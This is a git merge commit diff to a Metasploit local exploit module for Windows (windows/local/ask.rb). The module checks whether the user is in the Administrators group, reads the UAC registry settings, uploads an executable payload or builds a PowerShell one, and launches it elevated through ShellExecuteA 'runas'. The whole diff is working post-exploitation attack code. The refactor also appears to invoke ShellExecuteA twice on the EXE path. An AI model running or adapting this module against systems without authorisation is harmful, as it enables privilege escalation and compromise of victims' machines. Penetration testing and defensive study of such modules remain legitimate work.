Merge branch 'local/ask'

2013-10-22 16:06:16 -07:00 · 2013-10-22 16:06:16 -07:00 · a06c0a9575
parent 69131323af 9695b2d662
commit a06c0a9575
1 changed files with 53 additions and 43 deletions
--- a/modules/exploits/windows/local/ask.rb
+++ b/modules/exploits/windows/local/ask.rb
@ -40,14 +40,42 @@ class Metasploit3 < Msf::Exploit::Local
    register_options([
      OptString.new("FILENAME", [ false, "File name on disk"]),
      OptString.new("PATH", [ false, "Location on disk %TEMP% used if not set" ]),
-      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", false ]),
+      OptBool.new("UPLOAD", [ true, "Should the payload be uploaded?", true ]),
      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'EXE', ['PSH', 'EXE'] ]),
    ])

  end

+  def check
+    session.readline
+    print_status('Checking admin status...')
+    whoami = session.sys.process.execute('cmd /c whoami /groups',
+                                         nil,
+                                         {'Hidden' => true, 'Channelized' => true}
+    )
+    cmdout = []
+    while(cmdoutput = whoami.channel.read)
+      cmdout << cmdoutput
+    end
+    if cmdout.size == 0
+      fail_with(Exploit::Failure::None, "Either whoami is not there or failed to execute")
+    else
+      isinadmins = cmdout.join.scan(/S-1-5-32-544/)
+      if isinadmins.size > 0
+        print_good('Part of Administrators group! Continuing...')
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_error('Not in admins group, cannot escalate with this module')
+        print_error('Exiting...')
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
  def exploit
-
+    admin_check = check
+    if admin_check.join =~ /safe/
+      return Exploit::CheckCode::Safe
+    end
    root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
    open_key = session.sys.registry.open_key(root_key, base_key)
    lua_setting = open_key.query_value('EnableLUA')
@ -61,56 +89,38 @@ class Metasploit3 < Msf::Exploit::Local
    uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')

    case uac_level.data
-    when 2
-      print_status "UAC is set to 'Always Notify'"
-      print_status "The user will be prompted, wait for them to click 'Ok'"
-    when 5
-      print_debug "UAC is set to Default"
-      print_debug "The user will be prompted, wait for them to click 'Ok'"
-    when 0
-      print_good "UAC is not enabled, no prompt for the user"
+      when 2
+        print_status "UAC is set to 'Always Notify'"
+        print_status "The user will be prompted, wait for them to click 'Ok'"
+      when 5
+        print_debug "UAC is set to Default"
+        print_debug "The user will be prompted, wait for them to click 'Ok'"
+      when 0
+        print_good "UAC is not enabled, no prompt for the user"
    end

-
    #
    # Generate payload and random names for upload
    #
-
-    if datastore["TECHNIQUE"] == "EXE"
-      if datastore["UPLOAD"]
-        exe_payload = generate_exe_payload_exe
-
-        if datastore["FILENAME"]
-          payload_filename = datastore["FILENAME"]
-        else
-          payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-        end
-
-        if datastore["PATH"]
-          payload_path = datastore["PATH"]
-        else
-          payload_path = session.fs.file.expand_path("%TEMP%")
-        end
-
+    case datastore["TECHNIQUE"]
+      when "EXE"
+        exe_payload = generate_payload_exe
+        payload_filename = datastore["FILENAME"] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+        payload_path = datastore["PATH"] || expand_path("%TEMP%")
        cmd_location = "#{payload_path}\\#{payload_filename}"
-
        if datastore["UPLOAD"]
          print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
-          fd = session.fs.file.new(cmd_location, "wb")
-          fd.write(exe_payload)
-          fd.close
+          write_file(cmd_location, exe_payload)
+        else
+          #print_error("No Upload Path!")
+          fail_with(Exploit::Failure::BadConfig, "No Upload Path!")
+          return
        end
-
-        session.railgun.shell32.ShellExecuteA(nil,"runas",cmd_location,nil,nil,5)
-      else
-        print_error("No Upload Path!")
-        return
-      end
-    else
-      command = cmd_psh_payload(payload.encoded)
-      arguments = command.gsub("%COMSPEC% /B /C start powershell.exe ","")
-      session.railgun.shell32.ShellExecuteA(nil,"runas","powershell.exe","#{arguments}",nil,5)
+        command, args = cmd_location,nil
+        session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
+      when "PSH"
+        command, args = "cmd.exe",  " /c #{cmd_psh_payload(payload.encoded)}"
    end
+    session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
  end
 end
-